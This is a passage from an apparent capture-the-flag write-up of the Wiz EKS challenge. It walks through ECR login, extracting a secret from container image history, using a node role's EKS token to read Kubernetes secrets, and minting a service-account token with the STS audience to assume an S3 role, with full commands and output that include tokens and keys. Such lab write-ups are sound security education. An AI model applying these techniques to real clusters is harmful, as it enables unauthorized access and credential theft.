"datakey": "AQEBAHijEFXGwF1cipVOacG8qRmJoVBPay8LUUvU8RCVV0XoHwAAAH4wfAYJKoZIhvcNAQcGoG8wbQIBADBoBgkqhkiG9w0BBwEwHgYJYIZIAWUDBAEuMBEEDDzmqZO2lEQcMseecQIBEIA7jFKdv6H78nt1/OCRCarxkPZCbdewWZ7bPo/2+6P3meWkJeIo2L4yRpMdI6/bw+CYeViUxNw7qa+uR28=",
"version": "2",
"type": "DATA_KEY",
"expiration": 1699241680
}
root@wiz-eks-challenge:~# aws ecr get-login-password
eyJwYXlsb2FkIjoiYzNHeUpHaVZ2aDFxeTZzRHRIdnZKTlV4Y3BrNFdDeENvcGVHQU1BelRsN2Q0SWMwTE5lbWd6TmJWZGpOajU4UlBZTlZJbVNCbEtObmswMlMzTG1QVUJtajVyenFTM2tGUW1CbjVXampRTk5wbnV2TW0vZUtGcGRXb05ocUswRlhLNFEvZFg3RHBtdzY1aFczSFNSWWkreDVGVG1USmI3Sm9YeDU1SjY3eWxzcERiNFN1d2puYjVKd2JuSW13blpFVGxlQjF0MFNXRno4c2RleXAzRVFiMEU4R2VacERzTDFFanlsNklLT1pCK1hWdERaU0RkZzVsWUhBUk9OWjFqaFRCSzdWQlZ3WTR3NDFrUUgzK0xjK2U5QVBHdHg3QnRnenhodTFWc1dYU1gzVmVOdXRwNHJZNzhFNzk5TlJOQmhLWS9IZkdxR0Y2UWEvUlFtcDdNWWhXMEVNdDdvZEpTalU3dnRCbUt0RlFETDlVMmN5V1VrWlphQUgybnBMNWxGQnZDUWVwNUFvQVl0YWhmejN4b1FITnRaVHF4cWlLdm9ST0E0Q2ZNQ1dNanNuYkVhamNVajZOZjBBQ2crOUNYOVl0Si9Bb0tvSS9uUE5BVGxYTEs3ZnhMeDlSR2JGOGpQNVlTLzkwazNhOHU1Z0dLMEgxTDloYWh5NVVzSm5YeElKSkxWSDBDdFhrRFBpRmdQdTVvVzlGYWcwNHFxN2d4Q0Q5UGpMcjFGcEtCWHlaNWdLOERGdXJxMlRlVStBQWRKbitnQ0J4UTlXeVlNQmI3aHkrUDVZN1c4UEFOajhoOW1jVUxBVlQ5UVJLaC9LeC9BYXE5eis0MHdQdmV6ZVczd3JaeDBuMForYm9uMDVaaVBpZkFQYUYybkl0ZVZKRWNQaXlOK1hQUHZRSnJicWMyRVhuTGV1UVB6b2JSOWRVYjFWZHNGVDVpbFZzdjdGTnJzKy9xTHZCbW9tUWt4dWovSTAwNnRYQWlhaVAwYWd3RFR6Z0IwT2RWVDlwdkhjZlBQQjdTMU8vZWVJejQ0VFBQR2EyUnJRdklFS1crdVFDNWJYZWZxQnhqNjdsVVhXQkR3QTBhUm1VUlBjK3ZaU2c2ME5POVU1a0gzTnp4NDlUY0Z3UEFoZ0xFSUk4d0VLVjVXS2Q1VWx6L0UxTlFiTGZGVURVKzF4SGd6emk2d3kxVVBValNaVnU4TndoRkxwS09xZHIvUGFHMGU0TGZLNTRkSmRkMWZWSm9iWTNYdkhCOHMvbThLZ202NzFvT1J4Qit6QzY4N3EzbzJmQjJZWGJqdGpFTTREVWd2aWJJV2FHdHZkY2dvVkxGTm96SG1yZlowVTQyOTBGbi9ROVZSYkY0czB0YUZ6YTlORTNWbjRxcVk0YlBjem1tVXBoUW0vVE1GYmoxY2FPNWt6d1FxbC9CbWlrSGRnWHRITmhVVkQrNFE0YXdYTDhUWThQSHZYYmU2ZHRoeEk5YXhyMXg1a1BLSFVpa1ZTNllLM0o3bldnblIybkdpNldEd254aDRCRE1IYWQ3Y2trNllzUUlMVkVkVzlaU0JtVGt1ZnZjdUtmV0MxaXc0VThOT0F6S29CZnRWMWprVkYzek5SKzEzQmZBaGFvdlp6V21MTVBuQk9DQTJhdlZHOFlTOHZ0cWRpK2cydHROZ2t1T0M1NzM2MVpmSlM4bytHNXplcnZJUUFHM045THZPd3FBakZDWjNLMmE0b3NDVG9hUT0iLCJkYXRha2V5IjoiQVFFQkFIaWpFRlhHd0YxY2lwVk9hY0c4cVJtSm9WQlBheThMVVV2VThSQ1ZWMFhvSHdBQUFINHdmQVlKS29aSWh2Y05BUWNHb0c4d2JRSUJBREJvQmdrcWhraUc5dzBCQndFd0hnWUpZSVpJQVdVREJBRXVNQkVFREhKRmE5OHRURlRmVHBJTGhnSUJFSUE3N2pvUzc3azlUWnBPOTJ5cGVqSkhwUXhtYjBoRFR4ME1PT1ZCczIvQUtUZm5uQXg4RnoyMFhwTTYxZ2tObFFDTjN4azhDZFQzeEFIaEUrbz0iLCJ2ZXJzaW9uIjoiMiIsInR5cGUiOiJEQVRBX0tFWSIsImV4cGlyYXRpb24iOjE2OTkyNDEzNjh9
root@wiz-eks-challenge:~# aws ecr get-login-password | base64 -d |jq
{
"payload": "8W3OwSa14rWrO8YjOjlCt9F8oLPAVqE/fXrkloYH6+UifNlMYkZucfAxG6PkkixNozQFDqbjMsIp0ad2TRQPEpj+STFAf/gUnQG8G1eMGqz07cyyYkJeBW0TgvrCVd65JlSgOymUw/Oa4dBRVKOOOCZE9CPF/T0uTIL+89i5ARfT4GqMrGMEogETqcxIqdUCgEdVpWWMhAkDi6IKOVed2sQuwmYXxtdukaUiPOEnNNkJUbQYXqpO1EhHyR1TyFP1BS+RO33M7OLnfHf4hVimWCXhx5+Sp25Q+oriV1xr6GwCCIXW0ZlBQ3SO05zhJhwUfA28nbMT+UpDJVGwG6d6+ISvwZZsW9pDDLNxWT55Gaf6iM3hntiTMDnqlKsQHOqX6QsBvOw8oiBLftB/xWfeV6tFkZG+773JlqIjmTW0eUtNNG2nq1NN1UVsyhBZXHdbiYC1BP0/zE29qQ2LXVdlxZgBgVZ89QIXpFR574SUShK9CY1AKbJI1mG6yVwYj8LW5+1wNWYtOyzYTROg9Ft6CfiM2vFpc+KpLylSbA9iU/QGzstZQWrx3vB81mHl91dOYz/cHhBqKvs6w6d6M4witOkU+60znV2MvaqmoGetWFvkh7TL+jPgWKcxbSIkDogMZpLh4qmrJqjuSKk4M4XUO5R7giq/Flr/z7iIxal2556v0xnuU6PAb5nXSOlun4U+EIBF4X5JUYelJfbDRptD0eVgWXl8DZfTRCbV9bk8idnFxT9mZybkFwYmUG3PqTtEMshUrsyjItsN9JM09Qdgr8HFDMjCteggaU+Fx/PFebGlV7jCCQkOC6oZrqdrv7viD0AJDDspNxERfH2Zc1qDmVPOplWuCxqFRmJMUa/U2BlurC4u1JeblEKeJWKx0Yxf4B5XlRTCa7dJocD5mnT1TMCda4CWRvWcTtPpcmWmYpAsK9gW/i5O4pYibsdbvZk7cDhmQXRtUgw/1ASbIzr9S9lYXP9WPSv5DUij7wngLgoQE0lyMwg5d9XB9LZZ3M2eNTeN/FcSJR8Odf6hgTWR5LOK3TikDHjsYDaWrfFOA+41qEHvhtd4DwaZ/fx3DzftyVpfZXTMTI2vfTUydWggAin4TFjTfyolV8LyEeA1as3NgUdTwjHEiMd9bkDjuQuqphe+tZfes6mbesCLvjgr0UzwALmOkHpIri3w/7Xn0neZkzn7SzL62C6P81D/92qDBzL5CNnVGbLABXL8fGYKG3vzTAgoSYmfHTPnDaPQxoZg/khykiRrStsS2BD0SBm7+qJLoqJ84xjuJGLUzHJr2BE=",
"datakey": "AQEBAHijEFXGwF1cipVOacG8qRmJoVBPay8LUUvU8RCVV0XoHwAAAH4wfAYJKoZIhvcNAQcGoG8wbQIBADBoBgkqhkiG9w0BBwEwHgYJYIZIAWUDBAEuMBEEDIMmhQK5Dqsumg+yEwIBEIA7NW69GWBrvPGyF+SQI2Nao8aYq3Ad6ltS9R2G7c3X76u+5SRJ0SXgXVbr+arsC2VI47gvIwQIdjang0g=",
"version": "2",
"type": "DATA_KEY",
"expiration": 1699241423
}We can get the authorization token and also a login password, but we are not sure what to use.
After reading the documentation from Amazon we used the login password command to login with crane:
root@wiz-eks-challenge:~# aws ecr get-login-password --region us-west-1 | crane auth login --username AWS --password-stdin 688655246681.dkr.ecr.us-west-1.amazonaws.com
2023/11/05 15:41:46 logged in via /home/user/.docker/config.jsonAfter the login we checked the image config with crane:
root@wiz-eks-challenge:~# crane config 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c@sha256:7486d05d33ecb1c6e1c796d59f63a336cfa8f54a3cbc5abf162f533508dd8b01 | jq
{
"architecture": "amd64",
"config": {
"Env": [
"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
],
"Cmd": [
"/bin/sleep",
"3133337"
],
"ArgsEscaped": true,
"OnBuild": null
},
"created": "2023-11-01T13:32:07.782534085Z",
"history": [
{
"created": "2023-07-18T23:19:33.538571854Z",
"created_by": "/bin/sh -c #(nop) ADD file:7e9002edaafd4e4579b65c8f0aaabde1aeb7fd3f8d95579f7fd3443cef785fd1 in / "
},
{
"created": "2023-07-18T23:19:33.655005962Z",
"created_by": "/bin/sh -c #(nop) CMD [\"sh\"]",
"empty_layer": true
},
{
"created": "2023-11-01T13:32:07.782534085Z",
"created_by": "RUN sh -c #ARTIFACTORY_USERNAME=challenge@eksclustergames.com ARTIFACTORY_TOKEN=wiz_eks_challenge{the_history_of_container_images_could_reveal_the_secrets_to_the_future} ARTIFACTORY_REPO=base_repo /bin/sh -c pip install setuptools --index-url intrepo.eksclustergames.com # buildkit # buildkit",
"comment": "buildkit.dockerfile.v0"
},
{
"created": "2023-11-01T13:32:07.782534085Z",
"created_by": "CMD [\"/bin/sleep\" \"3133337\"]",
"comment": "buildkit.dockerfile.v0",
"empty_layer": true
}
],
"os": "linux",
"rootfs": {
"type": "layers",
"diff_ids": [
"sha256:3d24ee258efc3bfe4066a1a9fb83febf6dc0b1548dfe896161533668281c9f4f",
"sha256:9057b2e37673dc3d5c78e0c3c5c39d5d0a4cf5b47663a4f50f5c6d56d8fd6ad5"
]
}
}We can see the flag in the history:
wiz_eks_challenge{the_history_of_container_images_could_reveal_the_secrets_to_the_future}
4 —Pod Break
We start without interesting permissions:
root@wiz-eks-challenge:~# kubectl auth can-i --list
warning: the list may be incomplete: webhook authorizer does not support user rule resolution
Resources Non-Resource URLs Resource Names Verbs
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
podsecuritypolicies.policy [] [eks.privileged] [use]We can see that we have credentials for AWS and docker Hub:
root@wiz-eks-challenge:~# ls -lla ~/
total 40
drwxr-xr-x 5 root root 130 Nov 6 07:29 .
drwxr-xr-x 3 root root 18 Oct 31 16:26 ..
drwxr-xr-x 2 root root 39 Nov 5 15:17 .aws
-rw------- 1 root root 21221 Nov 6 07:18 .bash_history
-rw-r--r-- 1 root root 3771 Nov 5 09:11 .bashrc
drwx------ 2 root root 25 Nov 5 15:46 .docker
drwxr-xr-x 3 root root 51 Nov 6 07:23 .kube
-rw------- 1 root root 20 Nov 6 07:29 .lesshst
-rw------- 1 root root 1759 Nov 6 06:41 .viminfoWe start by running aws sts get-caller-identity to get the AWS identity:
root@wiz-eks-challenge:~# aws sts get-caller-identity
{
"UserId": "AROA2AVYNEVMQ3Z5GHZHS:i-0cb922c6673973282",
"Account": "688655246681",
"Arn": "arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster-nodegroup-NodeInstanceRole/i-0cb922c6673973282"
}From the Arn we can get the cluster name: eks-challenge-cluster. We tried to use some of the enum techniques described here but in all of them it gave us access denied:
root@wiz-eks-challenge:~# aws eks describe-cluster --name eks-challenge-cluster
An error occurred (AccessDeniedException) when calling the DescribeCluster operation: User: arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster-nodegroup-NodeInstanceRole/i-0cb922c6673973282 is not authorized to perform: eks:DescribeCluster on resource: arn:aws:eks:us-west-1:688655246681:cluster/eks-challenge-clusterWe also tried to create an EKS kubeconfig without success (reference):
root@wiz-eks-challenge:~# aws eks update-kubeconfig --name eks-challenge-cluster --region us-west-1
An error occurred (AccessDeniedException) when calling the DescribeCluster operation: User: arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster-nodegroup-NodeInstanceRole/i-0cb922c6673973282 is not authorized to perform: eks:DescribeCluster on resource: arn:aws:eks:us-west-1:688655246681:cluster/eks-challenge-clusterEventually, we were able to find the cluster token (reference):
root@wiz-eks-challenge:~# aws eks get-token --cluster-name eks-challenge-cluser
{
"kind": "ExecCredential",
"apiVersion": "client.authentication.k8s.io/v1beta1",
"spec": {},
"status": {
"expirationTimestamp": "2023-11-06T07:56:20Z",
"token": "k8s-aws-v1.aHR0cHM6Ly9zdHMudXMtd2VzdC0xLmFtYXpvbmF3cy5jb20vP0FjdGlvbj1HZXRDYWxsZXJJZGVudGl0eSZWZXJzaW9uPTIwMTEtMDYtMTUmWC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BU0lBMkFWWU5FVk1YTElSWk9ERCUyRjIwMjMxMTA2JTJGdXMtd2VzdC0xJTJGc3RzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyMzExMDZUMDc0MjIwWiZYLUFtei1FeHBpcmVzPTYwJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCUzQngtazhzLWF3cy1pZCZYLUFtei1TZWN1cml0eS1Ub2tlbj1Gd29HWlhJdllYZHpFR0VhREd1SnZHZEF3VE9sSWwlMkZiUXlLM0FaQjV3QTdIZzRUM2pmTFFFOFJvSEVsNkp5Q1FLWDBxZyUyQjZpYVd3cWRLZGxRZFk5aDB5UVpVV0xvbE92MlhyOHRKZFMlMkZXbkpRaTZWb1lld3JkendHN3R6Nko4aWxKWFFEeGYlMkJ5Z0ZCbWZQM0s5amNyVThDTkhYRE1tNTFYbTNBTTFPRkhKUnlhYW92UlNIYlBhWnRaelVvanVNN1VwbmMlMkY5eUslMkJURU9jJTJGYno5RVJwOUlCeXl3UHVWZjAwdFdFWlZZT2pqZjFkWk9QQUNIVUhlRWhwOFJDSVF2bnViMmZMUGpwQXg3OXVtYzZ4eGhFMHRpN2NCU2kzc0tLcUJqSXRyNSUyQmUzYm5pREtHeEtRVUwzRmNxMkxtZzFidlZhQUpRYVglMkZXUkhGVHJ5JTJGY21NUkNOUXRoJTJGNVY0UEdsJTJCJlgtQW16LVNpZ25hdHVyZT0xNmNlMGE0MDgzYjc4NTRjNTE3NDdlODVhYzVkYTMwYWU4ZjBhZjlkZWM1ZTc5OTEwY2U1OWJiZGE1OGM1ZDlj"
}
}We can decode the token:
root@wiz-eks-challenge:~# aws eks get-token --cluster-name eks-challenge-cluser | jq -r '.status.token' | cut -d "." -f 2 | base64 -d
https://sts.us-west-1.amazonaws.com/?Action=GetCallerIdentity&Version=2011-06-15&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIA2AVYNEVMXLIRZODD%2F20231106%2Fus-west-1%2Fsts%2Faws4_request&X-Amz-Date=20231106T075704Z&X-Amz-Expires=60&X-Amz-SignedHeaders=host%3Bx-k8s-aws-id&X-Amz-Security-Token=FwoGZXIvYXdzEGEaDGuJvGdAwTOlIl%2FbQyK3AZB5wA7Hg4T3jfLQE8RoHEl6JyCQKX0qg%2B6iaWwqdKdlQdY9h0yQZUWLolOv2Xr8tJdS%2FWnJQi6VoYewrdzwG7tz6J8ilJXQDxf%2BygFBmfP3K9jcrU8CNHXDMm51Xm3AM1OFHJRyaaovRSHbPaZtZzUojuM7Upnc%2F9yK%2BTEOc%2Fbz9ERp9IByywPuVf00tWEZVYOjjf1dZOPACHUHeEhp8RCIQvnub2fLPjpAx79umc6xxhE0ti7cBSi3sKKqBjItr5%2Be3bniDKGxKQUL3Fcq2Lmg1bvVaAJQaX%2FWRHFTry%2FcmMRCNQth%2F5V4PGl%2B&X-Amz-Signature=a257ce5d5bbf32b4e4dcfbee2b7dc6554c328c46d4f95c25ea4f290fdd357c99There is related information in this blog, we can try to create a new kube config but it failed because of the certificate:
#!/bin/bash
read -r -d '' KUBECONFIG <<EOF
apiVersion: v1
clusters:
- cluster:
certificate-authority: /var/run/secrets/kubernetes.io/serviceaccount/ca.crt
server: https://688655246681.dkr.ecr.us-west-1.amazonaws.com
name: arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster
contexts:
- context:
cluster: arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster
user: arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster
name: arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster
current-context: arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster
kind: Config
preferences: {}
users:
- name: arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster
user:
exec:
apiVersion: client.authentication.k8s.io/v1beta1
command: aws
args:
- eks
- get-token
- --region
- us-west-1
- --cluster-name
- eks-challenge-cluster
# - "-r"
# - "arn:aws:iam::$account_id:role/my-role"
# env:
# - name: "AWS_PROFILE"
# value: "aws-profile"
EOF
echo "${KUBECONFIG}" > ~/.kube/configThe error message:
root@wiz-eks-challenge:~# kubectl auth can-i --list
Unable to connect to the server: x509: certificate signed by unknown authorityWe failed to get the certificate data manually:
root@wiz-eks-challenge:~# aws eks describe-cluster --region us-west-1 --name eks-challenge-cluser --query "cluster.certificateAuthority.data" --output text
An error occurred (AccessDeniedException) when calling the DescribeCluster operation: User: arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster-nodegroup-NodeInstanceRole/i-0cb922c6673973282 is not authorized to perform: eks:DescribeCluster on resource: arn:aws:eks:us-west-1:688655246681:cluster/eks-challenge-cluserAt that point, we needed to think of another way. There is an option to use the token with kubectl, let’s see what results it will bring:
root@wiz-eks-challenge:~# kubectl --token $(aws eks get-token --cluster-name eks-challenge-cluster | jq -r '.status.token') auth can-i --list
warning: the list may be incomplete: webhook authorizer does not support user rule resolution
Resources Non-Resource URLs Resource Names Verbs
serviceaccounts/token [] [debug-sa] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
pods [] [] [get list]
secrets [] [] [get list]
serviceaccounts [] [] [get list]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
podsecuritypolicies.policy [] [eks.privileged] [use]Great, we have more permissions in this token and we can list pods, secrets and service accounts. Let’s check the secrets:
root@wiz-eks-challenge:~# kubectl --token $(aws eks get-token --cluster-name eks-challenge-cluster | jq -r '.status.token') get secrets -o yaml
apiVersion: v1
items:
- apiVersion: v1
data:
flag: d2l6X2Vrc19jaGFsbGVuZ2V7b25seV9hX3JlYWxfcHJvX2Nhbl9uYXZpZ2F0ZV9JTURTX3RvX0VLU19jb25ncmF0c30=
kind: Secret
metadata:
creationTimestamp: "2023-11-01T12:27:57Z"
name: node-flag
namespace: challenge4
resourceVersion: "883574"
uid: 26461a29-ec72-40e1-adc7-99128ce664f7
type: Opaque
kind: List
metadata:
resourceVersion: ""We can see the encoded flag, we will decode it:
root@wiz-eks-challenge:~# kubectl --token $(aws eks get-token --cluster-name eks-challenge-cluster | jq -r '.status.token') get secrets -o json | jq -r '.items[].data.flag' | base64 -d
wiz_eks_challenge{only_a_real_pro_can_navigate_IMDS_to_EKS_congrats}
References
5— Pod Break
We start by viewing the given data.
IAM Policy:
{
"Policy": {
"Statement": [
{
"Action": [
"s3:GetObject",
"s3:ListBucket"
],
"Effect": "Allow",
"Resource": [
"arn:aws:s3:::challenge-flag-bucket-3ff1ae2",
"arn:aws:s3:::challenge-flag-bucket-3ff1ae2/flag"
]
}
],
"Version": "2012-10-17"
}
}Trust Policy:
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Federated": "arn:aws:iam::688655246681:oidc-provider/oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589"
},
"Action": "sts:AssumeRoleWithWebIdentity",
"Condition": {
"StringEquals": {
"oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589:aud": "sts.amazonaws.com"
}
}
}
]
}Permissions:
{
"secrets": [
"get",
"list"
],
"serviceaccounts": [
"get",
"list"
],
"pods": [
"get",
"list"
],
"serviceaccounts/token": [
"create"
]
}We can see what exact permissions we have:
root@wiz-eks-challenge:~# kubectl auth can-i --list
warning: the list may be incomplete: webhook authorizer does not support user rule resolution
Resources Non-Resource URLs Resource Names Verbs
serviceaccounts/token [] [debug-sa] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
pods [] [] [get list]
secrets [] [] [get list]
serviceaccounts [] [] [get list]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
podsecuritypolicies.policy [] [eks.privileged] [use]We checked what these permissions give us:
root@wiz-eks-challenge:~# kubectl get secrets
No resources found in challenge5 namespace.
root@wiz-eks-challenge:~# kubectl get secrets --all-namespaces
Error from server (Forbidden): secrets is forbidden: User "system:node:challenge:ip-192-168-21-50.us-west-1.compute.internal" cannot list resource "secrets" in API group "" at the cluster scope
root@wiz-eks-challenge:~# kubectl get pods
No resources found in challenge5 namespace.
root@wiz-eks-challenge:~# kubectl get pods --all-namespaces
Error from server (Forbidden): pods is forbidden: User "system:node:challenge:ip-192-168-21-50.us-west-1.compute.internal" cannot list resource "pods" in API group "" at the cluster scope
root@wiz-eks-challenge:~# kubectl get serviceaccounts
NAME SECRETS AGE
debug-sa 0 5d19h
default 0 5d19h
s3access-sa 0 5d19h
root@wiz-eks-challenge:~# kubectl get serviceaccounts -o yaml
apiVersion: v1
items:
- apiVersion: v1
kind: ServiceAccount
metadata:
annotations:
description: This is a dummy service account with empty policy attached
eks.amazonaws.com/role-arn: arn:aws:iam::688655246681:role/challengeTestRole-fc9d18e
creationTimestamp: "2023-10-31T20:07:37Z"
name: debug-sa
namespace: challenge5
resourceVersion: "671929"
uid: 6cb6024a-c4da-47a9-9050-59c8c7079904
- apiVersion: v1
kind: ServiceAccount
metadata:
creationTimestamp: "2023-10-31T20:07:11Z"
name: default
namespace: challenge5
resourceVersion: "671804"
uid: 77bd3db6-3642-40d5-b8c1-14fa1b0cba8c
- apiVersion: v1
kind: ServiceAccount
metadata:
annotations:
eks.amazonaws.com/role-arn: arn:aws:iam::688655246681:role/challengeEksS3Role
creationTimestamp: "2023-10-31T20:07:34Z"
name: s3access-sa
namespace: challenge5
resourceVersion: "671916"
uid: 86e44c49-b05a-4ebe-800b-45183a6ebbda
kind: List
metadata:
resourceVersion: ""We have three service accounts, but except for that not something interesting. We also have permission to create a token for the debug-sa service account:
root@wiz-eks-challenge:~# TOKEN=$(kubectl create token debug-sa)
root@wiz-eks-challenge:~# echo $TOKEN
eyJhbGciOiJSUzI1NiIsImtpZCI6IjZkMjNjYTkwMGI2MTVhYWJmNTBmYWJlZDc0NzA1OTNiNjIyMDA5NmYifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjIl0sImV4cCI6MTY5OTI5MTQxNywiaWF0IjoxNjk5Mjg3ODE3LCJpc3MiOiJodHRwczovL29pZGMuZWtzLnVzLXdlc3QtMS5hbWF6b25hd3MuY29tL2lkL0MwNjJDMjA3QzhGNTBERTRFQzI0QTM3MkZGNjBFNTg5Iiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJjaGFsbGVuZ2U1Iiwic2VydmljZWFjY291bnQiOnsibmFtZSI6ImRlYnVnLXNhIiwidWlkIjoiNmNiNjAyNGEtYzRkYS00N2E5LTkwNTAtNTljOGM3MDc5OTA0In19LCJuYmYiOjE2OTkyODc4MTcsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpjaGFsbGVuZ2U1OmRlYnVnLXNhIn0.wCZ8nYeaUXqAbiyWHoofANqxBVWe5wc8rZMIbmg1coseG6EpGc0MR3fHJZRlfu5Ch8_iGXqiBNC0_yAwzTRdPvM4zZMS1fzVHWtOHNVFd2spiFRPXQxAXJRPxiGxOEkPGwYqpPdMJ5_FzcI8zK_TnuJkzNdeCoXfeIDDT2MHznnsSYspJNXB252q1Y4CfLy-0Db_z6gaSsOfkrbRg1URjPb4da-iYnsc7ca5ea3JVbskJSbIMXa7uweimbbo6ivpuDwz7tDd-fMyGR7eTDThqyn7WIrbs0MhBvtmhf3y0_9SF7bKIqvXuR-WfvkGzso2DiEvYN44eq-xKRYDMwRu_A
root@wiz-eks-challenge:~# echo $TOKEN > mytoken
It doesn’t help us because we have less permissions:
root@wiz-eks-challenge:~# kubectl --token $TOKEN auth can-i --list
warning: the list may be incomplete: webhook authorizer does not support user rule resolution
Resources Non-Resource URLs Resource Names Verbs
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
podsecuritypolicies.policy [] [eks.privileged] [use]It’s time to check different directions and we read here about sts:AssumeRoleWithWebIdentity:
This permission grants permission to obtain a set of temporary security credentials for users who have been authenticated in a mobile, web application, EKS… with a web identity provider
We tried the suggested assume role didn’t help:
# Arn of debug-sa with the created token
root@wiz-eks-challenge:~# aws sts assume-role-with-web-identity --role-arn arn:aws:iam::688655246681:role/challengeTestRole-fc9d18e --role-session-name something --web-identity-token ./mytoken
An error occurred (InvalidIdentityToken) when calling the AssumeRoleWithWebIdentity operation: The ID Token provided is not a valid JWT. (You may see this error if you sent an Access Token)
# Arn of s3access-sa with the default token
root@wiz-eks-challenge:~# aws sts assume-role-with-web-identity --role-arn arn:aws:iam::688655246681:role/challengeEksS3Role --role-session-name something --web-identity-token /var/run/secre
ts/kubernetes.io/serviceaccount/token
An error occurred (InvalidIdentityToken) when calling the AssumeRoleWithWebIdentity operation: The ID Token provided is not a valid JWT. (You may see this error if you sent an Access Token)It didn’t work, but thinking about it, it’s weird that we have permission to create a token for a service account that we don’t need (debug-sa). The one that we need is s3access-sa. We tried to assume the role of the requested service account(s3access-sa) but with the created token for debug-sa, we received a different error:
# Arn of s3access-sa with debug-sa token
root@wiz-eks-challenge:~# aws sts assume-role-with-web-identity --role-arn arn:aws:iam::688655246681:role/challengeEksS3Role --role-session-name something --web-identity-token $TOKEN
An error occurred (InvalidIdentityToken) when calling the AssumeRoleWithWebIdentity operation: Incorrect token audienceThe error is about the incorrect token audience. First, we need to understand what is audience according to kubernetes documentation:
Audiences is a list of the identifiers that the resource server presented with the token identifies as. Audience-aware token authenticators will verify that the token was intended for at least one of the audiences in this list. If no audiences are provided, the audience will default to the audience of the Kubernetes apiserver.
It specifies the intended recipient of the token. Usually, it is set to the Kubernetes API server’s URL. We can check the current audience by decoding the token and see that it appears as https://kubernetes.default.svc:
{
"aud": [
"https://kubernetes.default.svc"
],
"exp": 1699291417,
"iat": 1699287817,
"iss": "https://oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589",
"kubernetes.io": {
"namespace": "challenge5",
"serviceaccount": {
"name": "debug-sa",
"uid": "6cb6024a-c4da-47a9-9050-59c8c7079904"
}
},
"nbf": 1699287817,
"sub": "system:serviceaccount:challenge5:debug-sa"
}We need to find the correct audience. We already have it, recall the trust policy, one of the fields show the EKS audience:
"StringEquals": {
"oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589:aud": "sts.amazonaws.com"
}The correct audience should be sts.amazonaws.com. In the kubectl create token command there is an optional switch for setting the audience:
--audience=[]:
Audience of the requested token. If unset, defaults to requesting a token for use with the Kubernetes API
server. May be repeated to request a token valid for multiple audiences.We will create the token again with the correct audience and assume the role:
root@wiz-eks-challenge:~# TOKEN=$(kubectl create token debug-sa --audience sts.amazonaws.com)
root@wiz-eks-challenge:~# aws sts assume-role-with-web-identity --role-arn arn:aws:iam::688655246681:role/challengeEksS3Role --role-session-name something --web-identity-token $TOKEN
{
"Credentials": {
"AccessKeyId": "ASIA2AVYNEVMZAMFCQ6B",
"SecretAccessKey": "3bteSUtWee2pUNWwbqHrmTiACm9ynEp/6ZdUXlcj",
